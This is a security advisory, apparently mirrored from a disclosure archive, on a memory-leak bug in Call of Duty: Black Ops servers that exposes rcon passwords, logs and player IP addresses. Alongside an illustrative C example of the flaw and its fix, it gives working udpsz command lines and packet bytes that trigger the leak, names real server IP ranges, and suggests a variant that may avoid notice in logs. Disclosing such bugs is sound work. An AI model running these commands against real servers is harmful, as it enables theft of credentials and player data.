
Call Of Duty: Black Ops Memory Leak

Posted Dec 3, 2010
Authored by Luigi Auriemma | Site aluigi.org

Call of Duty: Black Ops suffers from a remote memory leak vulnerability.

tags | advisory, remote, memory leak
SHA-256 | 23f747fc13e4561d98d08374160cabdd2ae8c84df6b37dd2a2b12bf9451bf8d1

#######################################################################

Luigi Auriemma

Application: Call of Duty: Black Ops
http://www.callofduty.com
Versions: unknown, refer to the release date of this advisory
Platforms: unknown (it should be Windows)
Bug: memory leak
Exploitation: remote, versus server
Date: 18 Nov 2010
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Call of Duty Black Ops (cod7) is the new game of the CoD series.
Just like cod6, this one is also distributed as "client-only", which
means that a normal user cannot host a server.
Only some hosting companies (GameServers) or Treyarch itself can host
dedicated servers.


#######################################################################

======
2) Bug
======


When the server receives an rcon packet (opcode 0x00) it replies with
a packet having a fixed size of 1168 bytes, regardless of whether its
content is smaller.

The result is that various parts of the server's memory are disclosed
remotely to anyone, and through the continuous sending of these invalid
rcon packets it is possible to monitor the server and maybe retrieve
important information like the value of cvars (including rcon), parts
of the logs (including the output of previous rcon packets of the
admin), parts of the server's configuration and the IP addresses of the
other players.
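
The flawed pattern described above, next to a corrected one, as an added
example (not code from the game or from the advisory's author). Only the
1168-byte size comes from the advisory; the reused scratch buffer, the
reply text, the stale string and all function names are assumptions.

```c
#include <stdio.h>
#include <string.h>
#define REPLY_SIZE 1168   /* fixed reply size reported in the advisory */

/* Hypothetical scratch buffer that the server reuses between requests. */
unsigned char scratch[REPLY_SIZE];

/* Models earlier server activity leaving data behind (constructed value). */
void earlier_activity(void) {
    memset(scratch, 0, sizeof scratch);
    strcpy((char *)scratch + 64, "cvar_example=CONSTRUCTED-VALUE");
}

/* Flawed pattern: write a short message, then send the whole buffer. */
size_t reply_leaky(const char *msg, unsigned char *out) {
    size_t n = strlen(msg);
    if (n >= REPLY_SIZE) n = REPLY_SIZE - 1;
    memcpy(scratch, msg, n);
    scratch[n] = '\0';
    memcpy(out, scratch, REPLY_SIZE);   /* length ignores the content */
    return REPLY_SIZE;
}

/* Corrected pattern: send only the message and its terminator. */
size_t reply_sized(const char *msg, unsigned char *out) {
    size_t n = strlen(msg);
    if (n >= REPLY_SIZE) n = REPLY_SIZE - 1;
    memcpy(out, msg, n);
    out[n] = '\0';
    return n + 1;
}

/* Regression check: count non-zero bytes after the first terminator. */
size_t stale_bytes(const unsigned char *pkt, size_t len) {
    const unsigned char *nul = memchr(pkt, 0, len);
    size_t count = 0;
    if (!nul) return 0;
    for (const unsigned char *p = nul + 1; p < pkt + len; p++)
        if (*p) count++;
    return count;
}

int main(void) {
    unsigned char pkt[REPLY_SIZE];
    earlier_activity();
    size_t n = reply_leaky("constructed reply", pkt);
    printf("leaky: %zu bytes sent, %zu stale\n", n, stale_bytes(pkt, n));
    n = reply_sized("constructed reply", pkt);
    printf("sized: %zu bytes sent, %zu stale\n", n, stale_bytes(pkt, n));
}
```

Zeroing the buffer before each reply would also stop the disclosure if
the fixed 1168-byte size has to be kept.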


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/cod7mem.zip

udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1

or with the filter for easier visualization and monitoring:

udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1

For example, the Treyarch servers are available in a certain range that
covers different C classes like 173.199.77.x, 173.199.78.x, 173.199.79.x
and so on.

It's possible to use "ffffffff 00 6100000000000000" for receiving a
reply string shorter than 50 bytes, and so more memory is visible, but I
don't know if it will appear in the server's logs because it could be
considered a password guessing attack.


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

